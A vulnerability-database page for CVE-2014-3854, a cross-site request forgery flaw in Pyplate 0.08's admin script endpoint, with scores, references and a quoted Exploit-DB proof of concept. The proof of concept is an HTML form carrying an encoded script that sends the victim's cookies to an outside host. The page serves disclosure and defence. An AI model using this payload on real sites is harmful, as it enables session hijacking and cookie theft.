CVE-2014-3854 : Detail

CVE-2014-3854

Cross-Site Request Forgery - CSRF
A01-Broken Access Control
0.19%V3
Network
2014-08-07
08h00 +00:00
2014-08-07
05h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-site request forgery (CSRF) vulnerability in admin/addScript.py in Pyplate 0.08 allows remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the title parameter.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-352 Cross-Site Request Forgery (CSRF)
The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 39199

Publication date : 2014-05-22 22h00 +00:00
Author : Henri Salo
EDB Verified : Yes

source: https://www.securityfocus.com/bid/67610/info Pyplate is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. Pyplate 0.08 Beta is vulnerable; other versions may also be affected. <html> <body> <form action="http://www.example.com/admin/addScript.py"; method="POST"> <input type="hidden" name="title" value="<script>new&#32;Image&#40;&#41;&#46;src&#61;"http&#58;&#47;&#47;bugs&#46;fi&#47;evil&#46;py&#63;cookie&#61;"&#32;encodeURI&#40;document&#46;cookie&#41;&#59;<&#47;script>" /> <input type="hidden" name="file" value="bugs" /> <input type="hidden" name="category" value="&#47;" /> <input type="hidden" name="post" value="<p>bugs<&#47;p>&#13;&#10;" /> <input type="hidden" name="tags" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="state" value="new" /> <input type="submit" value="Submit request" /> </form> </body> </html>

Products Mentioned

Configuraton 0

Pyplate>>Pyplate >> Version 0.08

References

http://www.openwall.com/lists/oss-security/2014/05/23/1
Tags : mailing-list, x_refsource_MLIST
http://www.openwall.com/lists/oss-security/2014/05/14/3
Tags : mailing-list, x_refsource_MLIST